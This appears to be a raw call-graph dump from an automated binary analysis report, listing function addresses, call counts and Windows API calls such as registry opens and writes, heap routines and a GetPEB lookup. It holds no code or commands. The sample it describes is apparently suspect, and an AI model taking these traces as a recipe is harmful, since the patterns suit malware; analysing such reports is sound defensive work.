API calls 6847->6852 7977 10004161 6847->7977 6849 10001e66 6848->6849 6850 10004f02 7 API calls 6849->6850 6851 10001e7e 6850->6851 6853 10002bb7 11 API calls 6851->6853 6852->6847 6854 10001e8d 6853->6854 6856 1000af60 2 API calls 6854->6856 6857 10001e97 6856->6857 6858 10007008 4 API calls 6857->6858 6859 10001ea6 6858->6859 7919 1000114a 6859->7919 6862 10001f0f 6863 10007008 4 API calls 6862->6863 6863->6784 6864 1000afe0 2 API calls 6865 10001ec6 6864->6865 6866 1000afe0 2 API calls 6865->6866 6867 10001ed2 6866->6867 6868 1000afe0 2 API calls 6867->6868 6869 10001ede 6868->6869 6870 1000af60 2 API calls 6869->6870 6871 10001ee8 6870->6871 6872 10007008 4 API calls 6871->6872 6873 10001ef9 6872->6873 6873->6862 7949 10002cf0 6873->7949 6876 1000557e 6875->6876 6877 10005579 6875->6877 6879 100055d5 6876->6879 6880 10004f02 7 API calls 6876->6880 6934 100059d8 6876->6934 6878 10001479 GetPEB 6877->6878 6878->6876 6881 10005624 6879->6881 6884 10004f02 7 API calls 6879->6884 6883 100055b9 6880->6883 6882 10005673 6881->6882 6885 10004f02 7 API calls 6881->6885 6886 100056c2 6882->6886 6891 10004f02 7 API calls 6882->6891 6887 1000239d 6 API calls 6883->6887 6888 10005608 6884->6888 6890 10005657 6885->6890 6892 10005711 6886->6892 6893 10004f02 7 API calls 6886->6893 6887->6879 6889 1000239d 6 API calls 6888->6889 6889->6881 6895 1000239d 6 API calls 6890->6895 6896 100056a6 6891->6896 6894 10005760 6892->6894 6898 10004f02 7 API calls 6892->6898 6897 100056f5 6893->6897 6899 100057af 6894->6899 6904 10004f02 7 API calls 6894->6904 6895->6882 6900 1000239d 6 API calls 6896->6900 6902 1000239d 6 API calls 6897->6902 6903 10005744 6898->6903 6901 100057fe 6899->6901 6905 10004f02 7 API calls 6899->6905 6900->6886 6906 1000584d 6901->6906 6910 10004f02 7 API calls 6901->6910 6902->6892 6907 1000239d 6 API calls 6903->6907 6908 10005793 6904->6908 6909 100057e2 6905->6909 6911 1000589c 6906->6911 6916 10004f02 7 API calls 6906->6916 6907->6894 6912 1000239d 6 API calls 6908->6912 6914 1000239d 6 API calls 6909->6914 6915 10005831 6910->6915 6913 100058eb 6911->6913 6917 10004f02 7 API calls 6911->6917 6912->6899 6918 1000593a 6913->6918 6923 10004f02 7 API calls 6913->6923 6914->6901 6919 1000239d 6 API calls 6915->6919 6920 10005880 6916->6920 6922 100058cf 6917->6922 6924 10005989 6918->6924 6925 10004f02 7 API calls 6918->6925 6919->6906 6921 1000239d 6 API calls 6920->6921 6921->6911 6926 1000239d 6 API calls 6922->6926 6927 1000591e 6923->6927 6929 10004f02 7 API calls 6924->6929 6924->6934 6928 1000596d 6925->6928 6926->6913 6930 1000239d 6 API calls 6927->6930 6931 1000239d 6 API calls 6928->6931 6932 100059bc 6929->6932 6930->6918 6931->6924 6933 1000239d 6 API calls 6932->6933 6933->6934 6934->6595 6936 100024fe 6935->6936 6940 1000252a 6935->6940 6937 10004f02 7 API calls 6936->6937 6939 1000251c 6937->6939 6938 10002625 6938->6601 6941 1000397d 10 API calls 6939->6941 6940->6938 6942 10004f02 7 API calls 6940->6942 6951 10002587 6940->6951 6941->6940 6945 1000256b 6942->6945 6943 10004f02 7 API calls 6946 100025ba 6943->6946 6944 100025d6 6944->6938 6947 10004f02 7 API calls 6944->6947 6948 1000239d 6 API calls 6945->6948 6949 1000239d 6 API calls 6946->6949 6950 10002609 6947->6950 6948->6951 6949->6944 6952 1000239d 6 API calls 6950->6952 6951->6943 6951->6944 6952->6938 6954 10004f02 7 API calls 6953->6954 6955 1000223b 6954->6955 8688 10005a97 6955->8688 6958 1000af60 2 API calls 6959 10002253 6958->6959 6960 1000afe0 2 API calls 6959->6960 6961 10002265 6960->6961 6962 10004f02 7 API calls 6961->6962 6963 1000227d 6962->6963 6964 1000afe0 2 API calls 6963->6964 6965 1000228a 6964->6965 6966 100054c5 8 API calls 6965->6966 6967 1000229b 6966->6967 6968 1000afe0 2 API calls 6967->6968 6969 100022a8 6968->6969 6970 10004f02 7 API calls 6969->6970 6971 100022c0 6970->6971 6972 1000af60 2 API calls 6971->6972 6973 100022cb 6972->6973 6974 1000afe0 2 API calls 6973->6974 6975 10002306 6973->6975 6976 100022ee 6974->6976 6977 10007008 4 API calls 6975->6977 6978 1000afe0 2 API calls 6976->6978 6980 1000231f 6977->6980 6979 100022f8 6978->6979 6981 10002cf0 4 API calls 6979->6981 6982 10007008 4 API calls 6980->6982 6981->6975 6983 1000232e 6982->6983 6984 1000af30 HeapFree 6983->6984 6985 10002338 6984->6985 6986 1000af30 HeapFree 6985->6986 6987 10002341 6986->6987 6987->6600 6989 10004f08 6988->6989 6989->6989 7023 10007000 6989->7023 6992 10007000 2 API calls 7004 10004f37 6992->7004 6993 10005068 6994 1000af30 HeapFree 6993->6994 6995 1000508a 6994->6995 6996 1000af30 HeapFree 6995->6996 6997 10005093 6996->6997 6998 1000af30 HeapFree 6997->6998 7000 1000509b 6998->7000 6999 10005058 7002 1000afe0 2 API calls 6999->7002 7000->6612 7001 1000afe0 wcslen HeapReAlloc 7001->7004 7002->6993 7003 10007410 HeapReAlloc 7003->7004 7004->6993 7004->6999 7004->7001 7004->7003 7006 1000af60 2 API calls 7004->7006 7026 10007a10 7004->7026 7006->7004 7008 1000afec wcslen 7007->7008 7010 1000b00b 7007->7010 7009 1000b180 HeapReAlloc 7008->7009 7009->7010 7010->6612 7012 100074f0 7011->7012 7013 100074d8 7011->7013 7015 1000b180 HeapReAlloc 7012->7015 7013->7012 7014 100074df 7013->7014 7035 10007540 7014->7035 7018 100074fc 7015->7018 7017 100074e9 7017->6612 7018->6612 7020 1000af93 HeapReAlloc 7019->7020 7021 1000af77 RtlAllocateHeap 7019->7021 7022 1000afb4 7020->7022 7021->7022 7022->6612 7029 1000b040 7023->7029 7025 10004f2a 7025->6992 7032 1000b180 7026->7032 7030 1000b087 7029->7030 7031 1000b04a wcslen HeapAlloc 7029->7031 7030->7025 7031->7030 7033 1000b1a2 HeapReAlloc 7032->7033 7034 10007a1b 7032->7034 7033->7034 7034->7004 7036 1000b180 HeapReAlloc 7035->7036 7037 10007550 7036->7037 7037->7017 7037->7037 7058 10008060 7038->7058 7040 100054e4 7042 1000552c 7040->7042 7043 10005523 7040->7043 7061 10008350 7040->7061 7041 10005547 7047 1000af30 HeapFree 7041->7047 7042->7041 7045 1000afe0 2 API calls 7042->7045 7067 100081d0 HeapFree 7043->7067 7045->7041 7049 100030f8 7047->7049 7049->6623 7050 1000af60 2 API calls 7050->7043 7052 1000768e 7051->7052 7053 1000b180 HeapReAlloc 7052->7053 7054 100076ba 7053->7054 7054->6626 7068 100083f0 7055->7068 7057 1000319c 7057->6639 7059 10008068 RtlAllocateHeap 7058->7059 7060 1000807a 7058->7060 7059->7040 7060->7040 7062 1000835d 7061->7062 7063 1000b180 HeapReAlloc 7062->7063 7064 1000837b 7063->7064 7065 10008381 memcpy 7064->7065 7066 10005519 7064->7066 7065->7066 7066->7050 7067->7042 7069 10008400 7068->7069 7070 1000b180 HeapReAlloc 7069->7070 7071 10008485 7070->7071 7072 10008493 memmove 7071->7072 7072->7057 7074 10007000 2 API calls 7073->7074 7075 10002bd5 7074->7075 7076 10008060 RtlAllocateHeap 7075->7076 7077 10002be6 7076->7077 7217 10007620 7077->7217 7079 10002bf8 7080 10008060 RtlAllocateHeap 7079->7080 7086 10002c09 7080->7086 7081 10002c65 7084 1000afe0 2 API calls 7081->7084 7085 10002c82 7081->7085 7082 10002c5c 7222 100081d0 HeapFree 7082->7222 7084->7085 7087 1000af30 HeapFree 7085->7087 7086->7081 7086->7082 7090 10008350 2 API calls 7086->7090 7088 10002ca4 7087->7088 7089 1000af30 HeapFree 7088->7089 7092 10002cac 7089->7092 7091 10002c52 7090->7091 7093 1000af60 2 API calls 7091->7093 7092->6655 7093->7082 7095 10007000 2 API calls 7094->7095 7096 1000302e 7095->7096 7097 10007000 2 API calls 7096->7097 7098 1000303b 7097->7098 7099 1000304a 7098->7099 7223 100016e1 7098->7223 7102 10003050 7099->7102 7261 10004d18 7099->7261 7103 1000af30 HeapFree 7102->7103 7104 100030d4 7103->7104 7106 1000af30 HeapFree 7104->7106 7105 1000306e 7105->7102 7268 10002fc9 7105->7268 7108 100030dc 7106->7108 7108->6659 7108->6660 7110 10007000 2 API calls 7109->7110 7111 10001390 7110->7111 7112 1000139f 7111->7112 7113 100016e1 10 API calls 7111->7113 7115 100013a5 7112->7115 7307 10003353 7112->7307 7113->7112 7116 1000af30 HeapFree 7115->7116 7117 100013f8 7116->7117 7117->6671 7119 100035f3 7118->7119 7120 100035ee 7118->7120 7144 100035f9 7119->7144 7310 100026e4 7119->7310 7121 100016e1 10 API calls 7120->7121 7121->7119 7124 1000363c 7125 10003660 7124->7125 7127 100026e4 3 API calls 7124->7127 7128 100026e4 3 API calls 7125->7128 7131 10003684 7125->7131 7126 100026e4 3 API calls 7126->7124 7127->7125 7128->7131 7129 1000af30 HeapFree 7130 1000387f 7129->7130 7130->6679 7132 10008060 RtlAllocateHeap 7131->7132 7134 100036b8 7131->7134 7132->7134 7133 1000afe0 2 API calls 7133->7134 7134->7133 7136 100037a8 7134->7136 7134->7144 7147 1000af60 2 API calls 7134->7147 7319 10007700 7134->7319 7322 100077e0 7134->7322 7135 10003825 7328 100081d0 HeapFree 7135->7328 7136->7135 7138 1000afe0 2 API calls 7136->7138 7141 100037cc 7138->7141 7140 1000382e 7142 1000afe0 2 API calls 7140->7142 7145 10007700 HeapReAlloc 7141->7145 7142->7144 7144->7129 7146 1000380c 7145->7146 7148 100077e0 2 API calls 7146->7148 7147->7134 7149 1000381a 7148->7149 7150 1000af60 2 API calls 7149->7150 7150->7135 7152 10007000 2 API calls 7151->7152 7153 10002d86 7152->7153 7154 10007000 2 API calls 7153->7154 7155 10002d93 7154->7155 7156 10007000 2 API calls 7155->7156 7157 10002da0 7156->7157 7159 100016e1 10 API calls 7157->7159 7160 10002daf 7157->7160 7158 10004d18 4 API calls 7161 10002dd3 7158->7161 7159->7160 7160->7158 7167 10002db5 7160->7167 7161->7167 7329 100032e6 7161->7329 7162 1000af30 HeapFree 7163 10002e3d 7162->7163 7164 1000af30 HeapFree 7163->7164 7166 10002e46 7164->7166 7168 1000af30 HeapFree 7166->7168 7167->7162 7169 10002e4f 7168->7169 7169->6733 7171 10006c2c 7170->7171 7171->7171 7172 10007000 2 API calls 7171->7172 7173 10006c4e 7172->7173 7174 10007000 2 API calls 7173->7174 7175 10006c5b 7174->7175 7176 10006c6a 7175->7176 7177 100016e1 10 API calls 7175->7177 7178 10004d18 4 API calls 7176->7178 7181 10006c70 7176->7181 7177->7176 7179 10006c91 7178->7179 7182 10002fc9 4 API calls 7179->7182 7187 10006dbc 7179->7187 7180 1000afe0 2 API calls 7180->7181 7183 1000af30 HeapFree 7181->7183 7191 10006cc7 7182->7191 7184 10006e00 7183->7184 7185 1000af30 HeapFree 7184->7185 7186 10006e08 7185->7186 7188 1000af30 HeapFree 7186->7188 7187->7180 7189 10006e11 7188->7189 7190 1000af30 HeapFree 7189->7190 7192 10005274 7190->7192 7191->7187 7193 10008060 RtlAllocateHeap 7191->7193 7192->6665 7194 10006d25 7193->7194 7194->7187 7195 10002fc9 4 API calls 7194->7195 7196 10006d54 7195->7196 7197 10006db3 7196->7197 7199 10008350 2 API calls 7196->7199 7202 10006d82 7196->7202 7332 100081d0 HeapFree 7197->7332 7200 10006d78 7199->7200 7201 1000af60 2 API calls 7200->7201 7201->7202 7202->7197 7203 100074c0 HeapReAlloc 7202->7203 7204 10006da9 7203->7204 7205 1000af60 2 API calls 7204->7205 7205->7197 7207 10007bdf 7206->7207 7210 10007ad1 7206->7210 7207->6693 7208 10007b20 wcsncmp 7208->7210 7209 10007b56 7211 10007bb9 7209->7211 7213 10007ba7 memmove 7209->7213 7210->7208 7210->7209 7212 1000b180 HeapReAlloc 7211->7212 7214 10007bc0 7212->7214 7213->7211 7215 10007bd1 7214->7215 7216 10007bc6 wcsncpy 7214->7216 7215->6693 7216->7215 7218 10007628 7217->7218 7219 1000762d 7217->7219 7218->7079 7220 10007655 WideCharToMultiByte 7219->7220 7221 10007636 7219->7221 7220->7079 7221->7079 7222->7081 7224 10001718 7223->7224 7225 100016ec 7223->7225 7227 10001775 7224->7227 7229 10004f02 7 API calls 7224->7229 7260 1000199e 7224->7260 7226 10004f02 7 API calls 7225->7226 7228 1000170a 7226->7228 7230 100017c4 7227->7230 7233 10004f02 7 API calls 7227->7233 7275 1000397d 7228->7275 7232 10001759 7229->7232 7234 10001813 7230->7234 7235 10004f02 7 API calls 7230->7235 7286 1000239d 7232->7286 7238 100017a8 7233->7238 7236 10001862 7234->7236 7240 10004f02 7 API calls 7234->7240 7239 100017f7 7235->7239 7244 10004f02 7 API calls 7236->7244 7254 100018b1 7236->7254 7241 1000239d 6 API calls 7238->7241 7242 1000239d 6 API calls 7239->7242 7243 10001846 7240->7243 7241->7230 7242->7234 7246 1000239d 6 API calls 7243->7246 7247 10001895 7244->7247 7245 10004f02 7 API calls 7248 100018e4 7245->7248 7246->7236 7250 1000239d 6 API calls 7247->7250 7251 1000239d 6 API calls 7248->7251 7249 10004f02 7 API calls 7252 10001933 7249->7252 7250->7254 7255 10001900 7251->7255 7256 1000239d 6 API calls 7252->7256 7253 10004f02 7 API calls 7257 10001982 7253->7257 7254->7245 7254->7255 7255->7249 7259 1000194f 7255->7259 7256->7259 7258 1000239d 6 API calls 7257->7258 7258->7260 7259->7253 7259->7260 7260->7099 7262 10007000 2 API calls 7261->7262 7263 10004d29 7262->7263 7264 10004d61 7263->7264 7265 10004d32 RegOpenKeyExW 7263->7265 7266 1000af30 HeapFree 7264->7266 7265->7264 7267 10004d72 7266->7267 7267->7105 7269 10007000 2 API calls 7268->7269 7270 10002fd9 7269->7270 7271 10002fe2 RegQueryValueExW 7270->7271 7272 1000300b 7270->7272 7271->7272 7273 1000af30 HeapFree 7272->7273 7274 10003015 7273->7274 7274->7102 7276 10007000 2 API calls 7275->7276 7277 1000398f 7276->7277 7278 100039e7 7277->7278 7279 100039a8 7277->7279 7294 10001479 7277->7294 7283 1000af30 HeapFree 7278->7283 7281 10004f02 7 API calls 7279->7281 7282 100039cb 7281->7282 7284 1000239d 6 API calls 7282->7284 7285 10003a19 7283->7285 7284->7278 7285->7224 7287 100023a6 7286->7287 7287->7287 7288 10007000 2 API calls 7287->7288 7290 100023bf 7288->7290 7289 1000249e 7291 1000af30 HeapFree 7289->7291 7290->7289 7299 100081f0 7290->7299 7292 100024e9 7291->7292 7292->7227 7297 100032db GetPEB 7294->7297 7298 10001484 7297->7298 7298->7279 7300 10008210 7299->7300 7303 10008268 7299->7303 7301 1000b180 HeapReAlloc 7300->7301 7305 10008239 7301->7305 7302 100082c3 MultiByteToWideChar 7304 1000b180 HeapReAlloc 7302->7304 7303->7302 7306 100082e0 MultiByteToWideChar 7304->7306 7305->7290 7306->7290 7308 10003393 7307->7308 7309 1000335f RegCreateKeyExW 7307->7309 7308->7115 7309->7308 7311 10007000 2 API calls 7310->7311 7312 100026f6 7311->7312 7313 10007000 2 API calls 7312->7313 7314 10002703 7313->7314 7315 1000af30 HeapFree 7314->7315 7316 10002744 7315->7316 7317 1000af30 HeapFree 7316->7317 7318 1000274c 7317->7318 7318->7124 7318->7126 7320 1000b180 HeapReAlloc 7319->7320 7321 10007714 7320->7321 7321->7134 7323 100077fa 7322->7323 7324 1000b180 HeapReAlloc 7323->7324 7325 10007854 7324->7325 7326 10007881 7325->7326 7327 1000786a memmove 7325->7327 7326->7134 7327->7326 7328->7140 7330 100032f3 RegSetValueExW 7329->7330 7331 1000331b 7329->7331 7330->7331 7331->7167 7332->7187 7334 10002759 7333->7334 7334->7334 7335 10007000 2 API calls 7334->7335 7336 10002772 7335->7336 7337 10007008 4 API calls 7336->7337 7338 10002781 7337->7338 7339 1000ab28 4 API calls 7338->7339 7345 1000279f 7339->7345 7340 10002af0 7343 10008060 RtlAllocateHeap 7340->7343 7341 100027ee 7344 10004f02 7 API calls 7341->7344 7346 10002b13 7343->7346 7347 1000280e 7344->7347 7345->7340 7345->7341 7348 1000af60 2 API calls 7345->7348 7981 100041b3 7345->7981 7349 10002b75 7346->7349 8018 10008080 7346->8018 7350 1000afe0 2 API calls 7347->7350 7348->7345 7353 1000af30 HeapFree 7349->7353 7352 10002818 7350->7352 7355 10004f02 7 API calls 7352->7355 7356 10002b8a 7353->7356 7354 10002b34 7357 10002b58 7354->7357 7362 10007008 4 API calls 7354->7362 7358 10002830 7355->7358 7361 1000af30 HeapFree 7356->7361 8042 100081d0 HeapFree 7357->8042 7359 1000afe0 2 API calls 7358->7359 7363 1000283b 7359->7363 7364 10002b93 7361->7364 7365 10002b47 7362->7365 7366 1000afe0 2 API calls 7363->7366 7367 1000af30 HeapFree 7364->7367 8027 100014c3 7365->8027 7369 10002847 7366->7369 7370 10002b9b 7367->7370 7371 1000af60 2 API calls 7369->7371 7372 1000af30 HeapFree 7370->7372 7373 10002851 7371->7373 7374 10002ba4 7372->7374 7375 1000afe0 2 API calls 7373->7375 7376 1000acd3 2 API calls 7374->7376 7377 10002861 7375->7377 7378 10001ba9 7376->7378 7379 10004f02 7 API calls 7377->7379 7378->6784 7378->6786 7380 10002879 7379->7380 7381 1000afe0 2 API calls 7380->7381 7382 10002884 7381->7382 7383 10004f02 7 API calls 7382->7383 7384 1000289c 7383->7384 7385 1000afe0 2 API calls 7384->7385 7386 100028a7 7385->7386 7387 1000afe0 2 API calls 7386->7387 7388 100028b3 7387->7388 7389 1000af60 2 API calls 7388->7389 7390 100028bd 7389->7390 7391 10007008 4 API calls 7390->7391 7392 100028cc 7391->7392 7393 1000afe0 2 API calls 7392->7393 7394 100028dc 7393->7394 7395 1000afe0 2 API calls 7394->7395 7396 100028e8 7395->7396 7397 1000afe0 2 API calls 7396->7397 7398 100028f5 7397->7398 7399 1000afe0 2 API calls 7398->7399 7400 10002901 7399->7400 7401 1000af60 2 API calls 7400->7401 7410 1000290b 7401->7410 7402 10002a91 7403 1000afe0 2 API calls 7402->7403 7404 10002ac1 7403->7404 7405 1000afe0 2 API calls 7404->7405 7406 10002acd 7405->7406 7407 1000afe0 2 API calls 7406->7407 7408 10002ada 7407->7408 7409 1000afe0 2 API calls 7408->7409 7411 10002ae6 7409->7411 7410->7402 7413 100041b3 12 API calls 7410->7413 7414 10007008 4 API calls 7410->7414 7415 1000afe0 wcslen HeapReAlloc 7410->7415 7417 1000af60 RtlAllocateHeap HeapReAlloc 7410->7417 7997 100015cd 7410->7997 7412 1000af60 2 API calls 7411->7412 7412->7340 7413->7410 7414->7410 7415->7410 7417->7410 7419 10003aab 7418->7419 7419->7419 7420 10007000 2 API calls 7419->7420 7421 10003ac4 7420->7421 7422 10007008 4 API calls 7421->7422 7423 10003ad3 7422->7423 7424 1000ab28 4 API calls 7423->7424 7432 10003af1 7424->7432 7425 10004000 7428 10008060 RtlAllocateHeap 7425->7428 7426 10003b40 7427 10004f02 7 API calls 7426->7427 7430 10003b60 7427->7430 7431 10004023 7428->7431 7429 100041b3 12 API calls 7429->7432 7433 1000afe0 2 API calls 7430->7433 7434 10004085 7431->7434 7437 10008080 3 API calls 7431->7437 7432->7425 7432->7426 7432->7429 7435 1000af60 2 API calls 7432->7435 7436 10003b6d 7433->7436 7439 1000af30 HeapFree 7434->7439 7435->7432 7438 10004f02 7 API calls 7436->7438 7440 10004044 7437->7440 7441 10003b85 7438->7441 7442 1000409a 7439->7442 7443 10004068 7440->7443 7447 10007008 4 API calls 7440->7447 7445 1000afe0 2 API calls 7441->7445 7446 1000af30 HeapFree 7442->7446 8077 100081d0 HeapFree 7443->8077 7448 10003b90 7445->7448 7449 100040a3 7446->7449 7450 10004057 7447->7450 7452 10004f02 7 API calls 7448->7452 7453 1000af30 HeapFree 7449->7453 7451 100014c3 10 API calls 7450->7451 7451->7443 7455 10003ba8 7452->7455 7454 100040ab 7453->7454 7456 1000acd3 2 API calls 7454->7456 7457 1000afe0 2 API calls 7455->7457 7458 10001d3f 7456->7458 7459 10003bb3 7457->7459 7458->6784 7458->6840 7460 1000afe0 2 API calls 7459->7460 7461 10003bbf 7460->7461 7462 1000af60 2 API calls 7461->7462 7463 10003bc9 7462->7463 7464 1000afe0 2 API calls 7463->7464 7465 10003bd9 7464->7465 7466 10004f02 7 API calls 7465->7466 7467 10003bf1 7466->7467 7468 1000afe0 2 API calls 7467->7468 7469 10003bff 7468->7469 7470 10004f02 7 API calls 7469->7470 7471 10003c17 7470->7471 7472 1000afe0 2 API calls 7471->7472 7473 10003c22 7472->7473 7474 10004f02 7 API calls 7473->7474 7475 10003c3a 7474->7475 7476 1000afe0 2 API calls 7475->7476 7477 10003c45 7476->7477 7478 1000afe0 2 API calls 7477->7478 7479 10003c51 7478->7479 7480 1000af60 2 API calls 7479->7480 7481 10003c5b 7480->7481 7482 1000afe0 2 API calls 7481->7482 7483 10003c6b 7482->7483 7484 10004f02 7 API calls 7483->7484 7485 10003c83 7484->7485 7486 1000afe0 2 API calls 7485->7486 7487 10003c91 7486->7487 7488 10004f02 7 API calls 7487->7488 7489 10003ca9 7488->7489 7490 1000afe0 2 API calls 7489->7490 7491 10003cb7 7490->7491 7492 10004f02 7 API calls 7491->7492 7493 10003ccf 7492->7493 7494 1000afe0 2 API calls 7493->7494 7495 10003cda 7494->7495 7496 10004f02 7 API calls 7495->7496 7497 10003cf2 7496->7497 7498 1000afe0 2 API calls 7497->7498 7499 10003cfd 7498->7499 7500 1000afe0 2 API calls 7499->7500 7501 10003d09 7500->7501 7502 1000af60 2 API calls 7501->7502 7503 10003d13 7502->7503 7504 1000afe0 2 API calls 7503->7504 7505 10003d23 7504->7505 7506 10004f02 7 API calls 7505->7506 7507 10003d3b 7506->7507 7508 1000afe0 2 API calls 7507->7508 7509 10003d49 7508->7509 7510 10004f02 7 API calls 7509->7510 7511 10003d61 7510->7511 7512 1000afe0 2 API calls 7511->7512 7513 10003d6f 7512->7513 7514 10004f02 7 API calls 7513->7514 7515 10003d87 7514->7515 7516 1000afe0 2 API calls 7515->7516 7517 10003d92 7516->7517 7518 10004f02 7 API calls 7517->7518 7519 10003daa 7518->7519 7520 1000afe0 2 API calls 7519->7520 7521 10003db5 7520->7521 7522 10004f02 7 API calls 7521->7522 7523 10003dcd 7522->7523 7524 1000afe0 2 API calls 7523->7524 7525 10003ddb 7524->7525 7526 10004f02 7 API calls 7525->7526 7527 10003df3 7526->7527 7528 1000afe0 2 API calls 7527->7528 7529 10003dfe 7528->7529 7530 1000afe0 2 API calls 7529->7530 7531 10003e0a 7530->7531 7532 1000afe0 2 API calls 7531->7532 7533 10003e14 7532->7533 7534 10004f02 7 API calls 7533->7534 7535 10003e2c 7534->7535 7536 1000afe0 2 API calls 7535->7536 7537 10003e3a 7536->7537 7538 10004f02 7 API calls 7537->7538 7539 10003e52 7538->7539 7540 1000afe0 2 API calls 7539->7540 7541 10003e5d 7540->7541 7542 1000afe0 2 API calls 7541->7542 7543 10003e69 7542->7543 7544 1000afe0 2 API calls 7543->7544 7545 10003e73 7544->7545 7546 10004f02 7 API calls 7545->7546 7547 10003e8b 7546->7547 7548 1000afe0 2 API calls 7547->7548 7549 10003e99 7548->7549 7550 10004f02 7 API calls 7549->7550 7551 10003eb1 7550->7551 7552 1000afe0 2 API calls 7551->7552 7553 10003ebc 7552->7553 7554 1000afe0 2 API calls 7553->7554 7555 10003ec8 7554->7555 7556 1000afe0 2 API calls 7555->7556 7557 10003ed2 7556->7557 7558 10004f02 7 API calls 7557->7558 7559 10003eea 7558->7559 7560 1000afe0 2 API calls 7559->7560 7561 10003ef8 7560->7561 7562 10004f02 7 API calls 7561->7562 7563 10003f10 7562->7563 7564 1000afe0 2 API calls 7563->7564 7565 10003f1b 7564->7565 7566 1000afe0 2 API calls 7565->7566 7567 10003f27 7566->7567 7568 1000afe0 2 API calls 7567->7568 7569 10003f31 7568->7569 7570 10004f02 7 API calls 7569->7570 7571 10003f49 7570->7571 7572 1000afe0 2 API calls 7571->7572 7573 10003f57 7572->7573 7574 1000afe0 2 API calls 7573->7574 7575 10003f63 7574->7575 7576 1000af60 2 API calls 7575->7576 7577 10003f6d 7576->7577 7578 10007008 4 API calls 7577->7578 7579 10003f7e 7578->7579 7580 10007008 4 API calls 7579->7580 7581 10003f8d 7580->7581 7582 10007008 4 API calls 7581->7582 7583 10003f9e 7582->7583 7584 1000afe0 2 API calls 7583->7584 7585 10003fae 7584->7585 7586 1000afe0 2 API calls 7585->7586 7587 10003fb7 7586->7587 7588 10004f02 7 API calls 7587->7588 7589 10003fcf 7588->7589 7590 1000afe0 2 API calls 7589->7590 7591 10003fdd 7590->7591 7592 10004f02 7 API calls 7591->7592 7593 10003ff5 7592->7593 7594 1000af60 2 API calls 7593->7594 7594->7425 7596 100042ce 7595->7596 7596->7596 7597 10007000 2 API calls 7596->7597 7598 100042e7 7597->7598 8078 1000339b 7598->8078 7601 1000af60 2 API calls 7602 100042fc 7601->7602 7603 10004baf 7602->7603 8110 10005bb0 7602->8110 7605 1000af30 HeapFree 7603->7605 7607 10004bcc 7605->7607 7609 1000af30 HeapFree 7607->7609 7608 1000af60 2 API calls 7610 10004326 7608->7610 7612 10004bd5 7609->7612 7611 10007008 4 API calls 7610->7611 7616 10004335 7611->7616 7613 1000af30 HeapFree 7612->7613 7614 10004bde 7613->7614 7615 1000af30 HeapFree 7614->7615 7617 10004be7 7615->7617 7616->7603 7620 10007008 4 API calls 7616->7620 7618 1000af30 HeapFree 7617->7618 7619 10004bf0 7618->7619 7621 1000af30 HeapFree 7619->7621 7622 1000435a 7620->7622 7623 10004bf9 7621->7623 7624 10007008 4 API calls 7622->7624 7625 1000af30 HeapFree 7623->7625 7626 10004369 7624->7626 7627 10004c01 7625->7627 7628 10004f02 7 API calls 7626->7628 7629 1000af30 HeapFree 7627->7629 7630 10004381 7628->7630 7631 10004c0a 7629->7631 7633 1000afe0 2 API calls 7630->7633 7632 1000af30 HeapFree 7631->7632 7634 10004c13 7632->7634 7635 1000438b 7633->7635 7636 1000af30 HeapFree 7634->7636 7637 1000af60 2 API calls 7635->7637 7639 10004c1c 7636->7639 7638 10004395 7637->7638 7640 1000afe0 2 API calls 7638->7640 7641 1000af30 HeapFree 7639->7641 7642 100043a5 7640->7642 7643 10004c25 7641->7643 7644 10004f02 7 API calls 7642->7644 7645 1000af30 HeapFree 7643->7645 7646 100043bd 7644->7646 7647 10001d6a 7645->7647 7648 1000afe0 2 API calls 7646->7648 7647->6784 7647->6844 7649 100043c8 7648->7649 7650 10004f02 7 API calls 7649->7650 7651 100043e0 7650->7651 7652 1000afe0 2 API calls 7651->7652 7653 100043eb 7652->7653 7654 1000afe0 2 API calls 7653->7654 7655 100043f5 7654->7655 7656 1000af60 2 API calls 7655->7656 7657 100043ff 7656->7657 7658 1000afe0 2 API calls 7657->7658 7659 1000440f 7658->7659 7660 10004f02 7 API calls 7659->7660 7661 10004427 7660->7661 7662 1000afe0 2 API calls 7661->7662 7663 10004432 7662->7663 7664 10004f02 7 API calls 7663->7664 7665 1000444a 7664->7665 7666 1000afe0 2 API calls 7665->7666 7667 10004455 7666->7667 7668 1000afe0 2 API calls 7667->7668 7669 1000445f 7668->7669 7670 1000af60 2 API calls 7669->7670 7671 10004469 7670->7671 7672 1000afe0 2 API calls 7671->7672 7673 10004479 7672->7673 7674 10004f02 7 API calls 7673->7674 7675 10004491 7674->7675 7676 1000afe0 2 API calls 7675->7676 7677 1000449c 7676->7677 7678 10004f02 7 API calls 7677->7678 7679 100044b4 7678->7679 7680 1000afe0 2 API calls 7679->7680 7681 100044bf 7680->7681 7682 1000afe0 2 API calls 7681->7682 7683 100044c9 7682->7683 7684 1000af60 2 API calls 7683->7684 7685 100044d3 7684->7685 7686 100041b3 12 API calls 7685->7686 7687 100044de 7686->7687 7688 1000af60 2 API calls 7687->7688 7689 100044e8 7688->7689 7690 1000afe0 2 API calls 7689->7690 7691 100044f8 7690->7691 7692 10004f02 7 API calls 7691->7692 7693 10004510 7692->7693 7694 1000afe0 2 API calls 7693->7694 7695 1000451b 7694->7695 7696 1000afe0 2 API calls 7695->7696 7697 10004527 7696->7697 7698 1000afe0 2 API calls 7697->7698 7699 10004531 7698->7699 7700 10004f02 7 API calls 7699->7700 7701 10004549 7700->7701 7702 1000afe0 2 API calls 7701->7702 7703 10004554 7702->7703 7704 1000afe0 2 API calls 7703->7704 7705 10004560 7704->7705 7706 1000afe0 2 API calls 7705->7706 7707 1000456a 7706->7707 7708 1000afe0 2 API calls 7707->7708 7709 10004574 7708->7709 7710 1000af60 2 API calls 7709->7710 7711 1000457e 7710->7711 7712 1000afe0 2 API calls 7711->7712 7713 1000458e 7712->7713 7714 10004f02 7 API calls 7713->7714 7715 100045a6 7714->7715 7716 1000afe0 2 API calls 7715->7716 7717 100045b1 7716->7717 7718 10004f02 7 API calls 7717->7718 7719 100045c9 7718->7719 7720 1000afe0 2 API calls 7719->7720 7721 100045d4 7720->7721 7722 10004f02 7 API calls 7721->7722 7723 100045ec 7722->7723 7724 1000afe0 2 API calls 7723->7724 7725 100045f7 7724->7725 7726 1000afe0 2 API calls 7725->7726 7727 10004601 7726->7727 7728 1000afe0 2 API calls 7727->7728 7729 1000460b 7728->7729 7730 1000afe0 2 API calls 7729->7730 7731 10004617 7730->7731 7732 1000afe0 2 API calls 7731->7732 7733 10004621 7732->7733 7734 1000af60 2 API calls 7733->7734 7735 1000462b 7734->7735 7736 1000afe0 2 API calls 7735->7736 7737 1000463b 7736->7737 7738 10004f02 7 API calls 7737->7738 